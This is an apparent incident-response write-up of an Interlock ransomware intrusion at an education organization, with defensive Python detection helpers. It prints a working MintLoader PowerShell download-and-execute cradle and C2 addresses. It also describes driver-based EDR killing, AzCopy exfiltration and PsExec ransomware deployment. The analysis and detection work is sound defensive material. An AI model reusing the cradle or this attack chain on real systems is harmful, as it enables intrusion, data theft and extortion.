Researchers Detail Sophisticated Interlock Ransomware Attack Leveraging Zero-Day Driver Exploit

The Interlock ransomware group continues to demonstrate why financially motivated threat actors remain one of the most persistent and adaptive risks facing modern organizations. Active across both the United States and the United Kingdom, Interlock has shown a particular interest in the education sector—an industry often constrained by limited security resources and sprawling, heterogeneous environments.

Unlike many contemporary ransomware operations, Interlock does not function as a Ransomware-as-a-Service (RaaS) affiliate ecosystem. Instead, it appears to be a relatively small, tightly controlled group that develops, operates, and evolves its own malware stack. This independence gives the group a unique operational flexibility, allowing it to iterate quickly on tooling and tactics as defensive controls mature.

This article examines a recent Interlock intrusion investigated by the FortiGuard Incident Response (IR) team. The case highlights how long-dormant footholds, overlooked early indicators, and adaptive post-exploitation techniques can culminate in a high-impact ransomware event months after initial compromise. It also underscores the value of proactive threat hunting, especially when known indicators already exist in public reporting.


A Long-Running Intrusion with Familiar Roots

Early indicators from this intrusion align directly with activity documented by the eSentire Threat Response Unit in July and with components of the Interlock malware ecosystem previously analyzed by Mandiant. While portions of Interlock’s infrastructure and tooling have been publicly disclosed for months, the group has continued to refine its approach—introducing new payloads, rotating command-and-control (C2) infrastructure, and even exploiting a zero-day vulnerability in a gaming anti-cheat driver to bypass endpoint defenses.

At a high level, the intrusion unfolded in three phases:

  1. Initial access and persistence
  2. Data access and exfiltration
  3. Ransomware preparation and deployment

Each phase reveals a methodical, patient adversary willing to pause operations for months until conditions are favorable.


Phase One: Initial Access and Establishing a Foothold

31 March 2025

The victim in this investigation was a North America–based education organization. Initial access was traced to a MintLoader infection on an end user’s laptop. At the time, the affected system did not have endpoint detection and response (EDR) tooling installed.

The initial execution involved a distinctive PowerShell one-liner:

powershell -w h -c "iex $(irm 138[.]199[.]156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"

This command derived the URL path from the current Unix epoch time, floored to a 16-second boundary (so the requested path rotates every 16 seconds), retrieved a PowerShell payload from 138[.]199[.]156[.]22:8080, and executed it in memory with Invoke-Expression. The URL structure and command format matched known MintLoader campaigns attributed to TAG-124 infrastructure, which Interlock operators have historically leveraged to identify and target victims in North America.
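The following Python helpers are an added example, not code from the report or from the malware. They re-derive the 16-second epoch bucket the one-liner computes and use it in two places a hunter can look: the process command line (the iex/irm/UtcNow combination) and the resulting web request (a bare ten-digit path, 16-aligned and close to the request time). The sample command lines are constructed; the second is a benign decoy.

```python
"""Hunting helpers for the epoch-derived MintLoader cradle.

Added example (not from the report): re-derives the path the cradle
requests and flags both the command line and the web request.
"""
import re

# The one-liner floors the current Unix time to a multiple of 16 and uses
# that integer as the request path, so the path rotates every 16 seconds.
BUCKET_SECONDS = 16


def epoch_bucket(epoch_seconds: int) -> int:
    """Path value the cradle would request at the given Unix time."""
    return epoch_seconds - (epoch_seconds % BUCKET_SECONDS)


def looks_like_epoch_path(path: str, observed_epoch: int, slack: int = 300) -> bool:
    """Proxy-log check: a bare 10-digit path, aligned to 16 seconds and close
    to the time the request was seen. `slack` absorbs clock skew between the
    victim and the proxy while still rejecting unrelated numeric paths."""
    m = re.fullmatch(r"/?(\d{10})", path.strip())
    if not m:
        return False
    value = int(m.group(1))
    if value % BUCKET_SECONDS:
        return False
    return abs(value - epoch_bucket(observed_epoch)) <= slack


# Process-creation check: the cradle downloads with irm/iwr, executes with
# iex, and builds the path from [datetime]::UtcNow. All three must be present.
CRADLE_MARKERS = (
    re.compile(r"(?i)\biex\b|invoke-expression"),
    re.compile(r"(?i)\b(irm|iwr)\b|invoke-restmethod|invoke-webrequest"),
    re.compile(r"(?i)\[datetime\]::UtcNow"),
)


def is_cradle(cmdline: str) -> bool:
    return all(p.search(cmdline) for p in CRADLE_MARKERS)


def extract_c2(cmdline: str):
    """Return (host, port) from a cradle command line; accepts [.]-defanged IPs."""
    m = re.search(r"(\d{1,3}(?:\[\.\]|\.)\d{1,3}(?:(?:\[\.\]|\.)\d{1,3}){2})(?::(\d{2,5}))?", cmdline)
    if not m:
        return None
    return m.group(1).replace("[.]", "."), int(m.group(2) or 80)


SAMPLE_CMDLINES = [  # constructed, modelled on the one-liner in the report
    'powershell -w h -c "iex $(irm 138[.]199[.]156[.]22:8080/$($z = [datetime]::UtcNow; '
    "$y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; "
    '$w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"',
    'powershell -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
]


def hunt(cmdlines=SAMPLE_CMDLINES):
    """Return [(cmdline, (host, port))] for every command line matching the cradle."""
    return [(c, extract_c2(c)) for c in cmdlines if is_cradle(c)]
```

The path check is the part worth keeping: it lets you sweep proxy logs for this loader family even after the C2 address rotates, because the path shape does not change.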

NodeSnakeRAT Deployment

Following execution, a ZIP archive (download.zip) was created on disk. This archive contained a legitimate Node.js runtime (node.exe) used to execute a malicious JavaScript payload named j1wp4vw8.log (SHA1: 63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0).

This payload aligns with malware tracked by Mandiant as an early version of CORNFLAKE and by Quorum as NodeSnakeRAT.B. Throughout this article, it is referred to as NodeSnakeRAT.

Unlike purely fileless implants, NodeSnakeRAT frequently writes secondary payloads to disk. While not exhaustive, IR recovered several artifacts dropped over time, revealing the evolution of the attacker’s tooling and infrastructure. These included additional NodeSnakeRAT payloads, Interlock RAT variants, and auxiliary tooling staged under directories masquerading as legitimate application paths within the user’s roaming profile.

Persistence was established through an autorun registry entry named ChromeUpdater, which was later modified to point to updated NodeSnakeRAT payloads.


Dormancy and Early Lateral Movement

Three days after the initial infection, on April 3, 2025, a brief Remote Desktop Protocol (RDP) connection was made to the organization’s main file server using the built-in Administrator account, which was not in active use. This activity suggests early reconnaissance and credential validation rather than full lateral movement.

On April 21, 2025, NodeSnakeRAT was used to deploy a second JavaScript implant, k4myle3i.dll (SHA1: 6445E5CE51DA03934395ABB5411D3200D12ED7B3). This payload represents an early iteration of Interlock RAT, also tracked as WINDYTWIST.SEA.

After this point, the intrusion entered a prolonged dormant phase. The IR team assessed that the attacker’s inability to advance was likely due to the compromised laptop being only infrequently connected to the corporate network, which limited opportunities for lateral movement during the adversary’s operational windows.


Phase Two: Data Access and Exfiltration

5–15 September 2025

Activity resumed in early September following a rotation of Interlock’s C2 infrastructure. On September 5, the organization’s managed detection and response (MDR) service identified a similar NodeSnakeRAT infection chain on an internal application server.

Because this server showed no evidence of MintLoader or other initial access vectors—and used the same Node.js and JavaScript tooling—this activity was assessed as a continuation of the original intrusion.

A More Capable Interlock RAT

The attacker deployed another Interlock RAT payload (node.log, SHA1: 2D5F88C396553669BD50183644D77AD3C71D72BB) containing new hardcoded C2 IPs. The RAT was implemented as heavily obfuscated JavaScript, with more than 130 dynamically resolved strings retrieved at runtime through a function named a0n().

This design significantly complicates static analysis and string-based detection. Function names and IDs varied across samples, indicating automated or semi-automated build processes.

Upon execution, the RAT profiled the host, in part by running the systeminfo command, collecting details such as:

  • Username and privilege level
  • Domain membership
  • Computer name
  • Windows version

This data was sent in plaintext to one of several hardcoded C2 servers over TCP port 443. The initial beacon packet included a four-byte magic value (0xDF691155) followed by JSON-formatted system data. Subsequent communications were encrypted using a custom XOR-based scheme. Although the RAT used the HTTPS port, the beacon was not TLS, so a non-TLS first packet on TCP 443 that begins with this magic value is a usable network detection opportunity.
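As an added example (not the RAT’s code or any vendor’s detection logic), the following Python triages the first client bytes of a TCP/443 flow against the framing described above. The report does not state the byte order of the magic value, so both orders are tried; the JSON field names in the sample are constructed.

```python
"""Triage for the Interlock RAT beacon framing: 4-byte magic 0xDF691155
followed by a JSON body, sent in cleartext to TCP/443.

Added example, not from the report. Byte order of the magic is not given
in the report, so both are accepted; sample JSON fields are constructed.
"""
import json

MAGIC = 0xDF691155


def parse_beacon(payload: bytes, byteorder: str = "big"):
    """Return the decoded JSON body if `payload` is a beacon, else None."""
    if len(payload) < 6:  # 4 magic bytes plus at least '{}'
        return None
    if int.from_bytes(payload[:4], byteorder) != MAGIC:
        return None
    try:
        body = json.loads(payload[4:].decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return None
    return body if isinstance(body, dict) else None


def build_beacon(info: dict, byteorder: str = "big") -> bytes:
    """Only used here to construct test traffic with the observed framing."""
    return MAGIC.to_bytes(4, byteorder) + json.dumps(info).encode("utf-8")


def classify_port443_payload(payload: bytes) -> str:
    """Label the first client bytes of a TCP/443 flow. A TLS ClientHello is a
    handshake record (0x16) with major version 0x03; the RAT beacon starts
    with the magic; anything else is cleartext that deserves a look."""
    if payload[:1] == b"\x16" and payload[1:2] == b"\x03":
        return "tls"
    for order in ("big", "little"):
        if parse_beacon(payload, order) is not None:
            return f"interlock-beacon-{order}-endian"
    return "cleartext-non-tls"


SAMPLE_INFO = {  # constructed; mirrors the categories the report lists
    "user": "CORP\\jdoe", "admin": False, "domain": "CORP",
    "host": "LAPTOP-17", "os": "Microsoft Windows 11 Pro",
}
```

The same check translates directly to an IDS signature on destination port 443: a content match on the four magic bytes at depth 4 (for example `content:"|df 69 11 55|"; depth:4;` in Suricata syntax, with `|55 11 69 df|` for the little-endian reading), restricted to flows that never negotiated TLS.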

Supported Command Set

The Interlock RAT supported a wide range of commands, including:

  • SOCKS5 proxying for pivoting traffic
  • Interactive remote shells (CONSOLE)
  • Single-command execution (CONSOLE_ONE_COMMAND)
  • Persistence management
  • Sleep and disconnect operations

These capabilities enabled the adversary to perform flexible, low-noise post-exploitation across multiple hosts.

Persistence for later-stage RAT implants was achieved through scheduled tasks masquerading as legitimate Windows maintenance jobs, such as:

  • \Microsoft\Windows\Defrag\ScheduledDefrags
  • \TimeSyncDrive
  • \TimeSyncroDriver
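The persistence artefacts described in this section (a Run-key value named ChromeUpdater, and scheduled tasks whose names imitate Windows maintenance jobs, all ultimately launching node.exe against a payload stored with a misleading extension) share traits that can be triaged mechanically. The Python below is an added example, not from the report or from Fortinet tooling: the entries are constructed from the artefact names in the report, the directories under the roaming profile are invented, and the table of genuine built-in tasks is a one-entry placeholder to be populated from a clean reference host.

```python
"""Triage of autorun and scheduled-task entries for Interlock-style persistence.

Added example, not from the report. Sample entries are constructed; the
built-in task table is abridged and should be built from a clean host.
"""
import difflib
import ntpath
import re

# Genuine built-in task path -> binary it is expected to run (abridged).
BUILTIN_TASKS = {r"\microsoft\windows\defrag\scheduleddefrag": "defrag.exe"}
# Script hosts and the file extensions they are normally handed.
INTERPRETER_EXTS = {
    "node.exe": {".js", ".mjs", ".cjs"},
    "wscript.exe": {".js", ".vbs", ".wsf"},
    "cscript.exe": {".js", ".vbs", ".wsf"},
    "mshta.exe": {".hta"},
    "rundll32.exe": {".dll"},
}
USER_WRITABLE = re.compile(r"(?i)\\(users|programdata)\\|%(appdata|localappdata|temp|public)%")


def split_command(command: str):
    """Split 'exe args', honouring a quoted executable path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end], command[end + 1:].strip()
    exe, _, args = command.partition(" ")
    return exe, args.strip()


def triage(entry: dict) -> list:
    """Return the reasons an autorun or task entry deserves a second look."""
    reasons = []
    exe, args = split_command(entry["command"])
    exe_name = ntpath.basename(exe).lower()
    name = entry["name"].lower()

    if USER_WRITABLE.search(exe):
        reasons.append("binary lives in a user-writable location")

    expected_exts = INTERPRETER_EXTS.get(exe_name)
    if expected_exts and args:
        target = args.split()[0].strip('"')  # first argument; paths with spaces need quoting
        ext = ntpath.splitext(target)[1].lower()
        if ext not in expected_exts:
            reasons.append(f"{exe_name} handed a {ext or 'extensionless'} file: {ntpath.basename(target)}")

    if entry["kind"] == "task":
        expected_bin = BUILTIN_TASKS.get(name)
        if expected_bin and exe_name != expected_bin:
            reasons.append(f"built-in task name but runs {exe_name} instead of {expected_bin}")
        elif not expected_bin:
            near = difflib.get_close_matches(name, list(BUILTIN_TASKS), n=1, cutoff=0.9)
            if near:
                reasons.append(f"name imitates built-in task {near[0]}")
            if name.count("\\") == 1:
                # Weak signal: Microsoft's own tasks never sit at the library
                # root, but third-party updaters often do.
                reasons.append("task registered at the root of the task library")
    return reasons


SAMPLE_ENTRIES = [  # constructed from the artefact names in the report; paths invented
    {"kind": "run_key", "name": "ChromeUpdater",
     "command": r'"C:\Users\jdoe\AppData\Roaming\Google\Chrome\node.exe" '
                r"C:\Users\jdoe\AppData\Roaming\Google\Chrome\j1wp4vw8.log"},
    {"kind": "task", "name": r"\Microsoft\Windows\Defrag\ScheduledDefrags",
     "command": r"C:\Users\jdoe\AppData\Roaming\Google\Chrome\node.exe "
                r"C:\Users\jdoe\AppData\Roaming\Google\Chrome\node.log"},
    {"kind": "task", "name": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "command": r"%windir%\system32\defrag.exe -c -h -o -$"},
    {"kind": "task", "name": r"\TimeSyncDrive",
     "command": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Crypto\node.exe "
                r"C:\Users\jdoe\AppData\Roaming\Microsoft\Crypto\k4myle3i.dll"},
]


def report(entries=SAMPLE_ENTRIES) -> dict:
    """Map entry name -> reasons, omitting entries with nothing to report."""
    return {e["name"]: r for e in entries if (r := triage(e))}
```

The near-name check is what catches ScheduledDefrags against the genuine ScheduledDefrag; the extension check is what catches node.exe being handed a .log or .dll file regardless of what the task is called.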

GUI-Driven Operations and ScreenConnect

By mid-September, the attacker shifted tactics. On September 13, ScreenConnect was installed across multiple endpoints using an MSI installer likely generated with Advanced Installer.

The ScreenConnect service communicated with the domain user[.]kangaroosim[.]com, which resolved to 91[.]92[.]241[.]179 and was already known in threat intelligence as malicious ScreenConnect infrastructure.

This pivot to GUI-based tooling likely reflected two factors:

  1. Increased friction from the victim’s EDR tooling
  2. Greater operator comfort performing interactive exploration and data staging

Using ScreenConnect and chained RDP access, the adversary browsed file servers extensively and modified firewall rules to allow RDP connections.

Data Exfiltration via AzCopy

On September 15, the attacker used RDP to access the primary file server and executed AzCopy (win64.exe, SHA1: BE39DBADFC9CFC494F1B7BF3A04E49C336E0FA0D) to exfiltrate more than 250 GB of data to an Azure storage account.

This technique mirrors prior Interlock activity reported by Cisco Talos and represented the only observed bulk exfiltration during the intrusion.


Phase Three: Ransomware Preparation and Deployment

16 September – 12 October 2025

Notably, there was a multi-week delay between data exfiltration and ransomware deployment. The IR team assessed that the attackers initially attempted data-only extortion and reverted to encryption when that leverage proved insufficient.

Dual-Platform Ransomware

Two ransomware variants were deployed:

  • Windows endpoints: JavaScript-based ransomware (jar.jar, SHA1: AD77FBDBB2FCBDB440428EED3E76D106E1119FCF)
  • Nutanix hypervisor: Linux ELF binary (script, SHA1: F5C6BD4E9686AFB0C4E7C1C1733FEBB4065D514F)

On October 10, the attacker accessed the Nutanix environment via SSH using existing administrator credentials. Logical disks were enumerated and encrypted using the ELF payload, adding the .!nt3rlock extension and dropping a ransom note.


Defense Evasion with a Zero-Day Driver

In preparation for widespread ransomware deployment, the attacker attempted to disable Fortinet security tooling using a novel process-killing utility dubbed Hotta Killer (polers.dll, SHA1: 3B9B2D5934F9ED1E3A000A760A6FA90422E8A555).

This tool leveraged a signed but vulnerable anti-cheat driver (UpdateCheckerX64.sys, SHA1: 7556AE58C215B8245A43F764F0676C7A8F0FDD1A) affected by CVE-2025-61155.

By installing the driver as a kernel service and sending it requests through its device symbolic link (\\.\HtAntiCheatDriver), the malware attempted to terminate processes matching the pattern Forti*.exe using ZwTerminateProcess() from kernel context. Because the driver carried a valid signature, driver signature enforcement alone did not stop it; containing this class of abuse requires hash- or allow-list-based driver control, and the load itself (a kernel service installed from a non-standard path, followed by a burst of security-agent terminations) is the point to detect.
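The sequence above (kernel-driver service installed, the same file loaded, then a burst of security-agent process terminations) is a temporal pattern rather than a single event, and the Python below correlates it. It is an added example, not the attacker’s tool or vendor logic. The event records are constructed: field names are abridged from the usual sources (System log event 7045 for service installation, Sysmon event 6 for driver load, Sysmon event 5 for process termination), the service name and paths are invented, and the window and threshold are assumptions to tune. The only value taken from the report is the SHA1 of the vulnerable driver.

```python
"""Correlate install -> load -> kill for a bring-your-own-vulnerable-driver
process killer. Added example, not from the report; events are constructed.
"""
import fnmatch
import re

KNOWN_VULNERABLE_SHA1 = {  # from the report; extend from vendor blocklists
    "7556AE58C215B8245A43F764F0676C7A8F0FDD1A": "UpdateCheckerX64.sys (CVE-2025-61155)",
}
PROTECTED_PATTERNS = ["forti*.exe"]  # agent image patterns to watch (assumed; add your own)
USER_WRITABLE = re.compile(r"(?i)\\(users|programdata|windows\\temp)\\")
WINDOW_SECONDS = 120  # install, load and kills must fall inside this window (assumed)
MIN_KILLS = 2         # fewer protected terminations than this is treated as noise (assumed)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def is_protected(image: str) -> bool:
    return any(fnmatch.fnmatch(basename(image).lower(), p) for p in PROTECTED_PATTERNS)


def correlate(events: list) -> list:
    """Return one finding per driver load that is either a known vulnerable
    driver or is followed by MIN_KILLS+ protected-process terminations.
    `signed` is deliberately not a decision input: the abused driver was signed."""
    events = sorted(events, key=lambda e: e["ts"])
    findings = []
    for i, load in enumerate(events):
        if load["type"] != "driver_load":
            continue
        reasons = []
        sha1 = load.get("sha1", "").upper()
        if sha1 in KNOWN_VULNERABLE_SHA1:
            reasons.append("known vulnerable driver: " + KNOWN_VULNERABLE_SHA1[sha1])
        if USER_WRITABLE.search(load["image"]):
            reasons.append("driver loaded from user-writable path")
        installs = [e for e in events[:i]
                    if e["type"] == "service_install"
                    and load["ts"] - e["ts"] <= WINDOW_SECONDS
                    and basename(e["image"]).lower() == basename(load["image"]).lower()]
        if installs:
            last = installs[-1]
            reasons.append(f"kernel service {last['service']!r} installed {load['ts'] - last['ts']}s earlier")
        kills = [e for e in events[i + 1:]
                 if e["type"] == "process_terminate"
                 and e["ts"] - load["ts"] <= WINDOW_SECONDS
                 and is_protected(e["image"])]
        if len(kills) >= MIN_KILLS:
            reasons.append(f"{len(kills)} protected processes terminated within {WINDOW_SECONDS}s of load")
        if sha1 in KNOWN_VULNERABLE_SHA1 or len(kills) >= MIN_KILLS:
            findings.append({"driver": load["image"], "kills": len(kills), "reasons": reasons})
    return findings


SAMPLE_EVENTS = [  # constructed; service name, paths and process names invented to fit the report
    {"ts": 1000, "type": "service_install", "service": "HtAntiCheat",
     "image": r"C:\Users\Public\UpdateCheckerX64.sys"},
    {"ts": 1003, "type": "driver_load", "image": r"C:\Users\Public\UpdateCheckerX64.sys",
     "sha1": "7556ae58c215b8245a43f764f0676c7a8f0fdd1a", "signed": True},
    {"ts": 1010, "type": "process_terminate", "image": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe"},
    {"ts": 1011, "type": "process_terminate", "image": r"C:\Program Files\Fortinet\FortiClient\FortiESNAC.exe"},
    {"ts": 1012, "type": "process_terminate", "image": r"C:\Windows\explorer.exe"},
    {"ts": 5000, "type": "driver_load", "image": r"C:\Windows\System32\drivers\tcpip.sys",
     "sha1": "0" * 40, "signed": True},
]
```

Two points in the design matter more than the thresholds. First, the hash match fires on its own, so a known-bad driver is reported even if the kill step never happens. Second, the kill-burst path fires without any hash, which is what catches the next vulnerable driver before it appears on a blocklist.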


Windows Ransomware Mechanics

The JavaScript ransomware operated autonomously, using a hardcoded RSA public key and multithreaded AES encryption. It avoided critical system directories and file extensions, employed partial encryption on large files for speed, and deleted itself after execution using a delayed PowerShell command.

Encrypted Windows files were appended with the .gif extension.


Credential Theft and Final Deployment

Before mass deployment, the attackers executed a custom infostealer (move.dll) to harvest browser credentials, cookies, history, and bookmarks from multiple browsers, including Chrome, Edge, Firefox, Brave, and Opera variants.

Extracted data was saved locally as CSV files and likely used to validate credentials for domain-wide ransomware deployment.

Large-scale encryption was then executed via a batch script (W_0.bat) using PsExec and valid domain administrator credentials to remotely execute a PowerShell script (1.ps1) across endpoints.


Key Lessons from the Interlock Intrusion

This case illustrates several critical realities of the modern ransomware landscape:

  • Dormant access is dangerous: The initial compromise occurred more than six months before ransomware deployment.
  • Known indicators matter: Many IOCs associated with this intrusion had been publicly available for months.
  • Adaptation is constant: Interlock evolved from PowerShell loaders to Node.js RATs, GUI tooling, and kernel-level driver abuse.

While Interlock’s approach differs from typical RaaS affiliates, the defensive takeaways remain consistent.


High-ROI Defensive Recommendations

Three defensive controls stand out as particularly effective and low-cost:

  1. Explicitly block unauthorized remote access tools
    Detect and alert on any attempted installation or execution.
  2. Block workstation-to-workstation SMB and RDP
    This dramatically reduces lateral movement pathways.
  3. Block outbound PowerShell network connections
    Prevents common download cradles used in early-stage compromise.

Each control increases attacker friction, extends defender response windows, and creates high-confidence detection opportunities.


Final Thoughts

The Interlock ransomware group exemplifies a mature, patient adversary willing to invest time in maintaining access, adapting tooling, and exploiting gaps in visibility. This intrusion reinforces the importance of threat-centric intelligence filtering, continuous hunting, and rapid integration of new indicators into defensive tooling.

In today’s threat landscape, ransomware is rarely a single event—it is the final chapter of a story that often begins months earlier.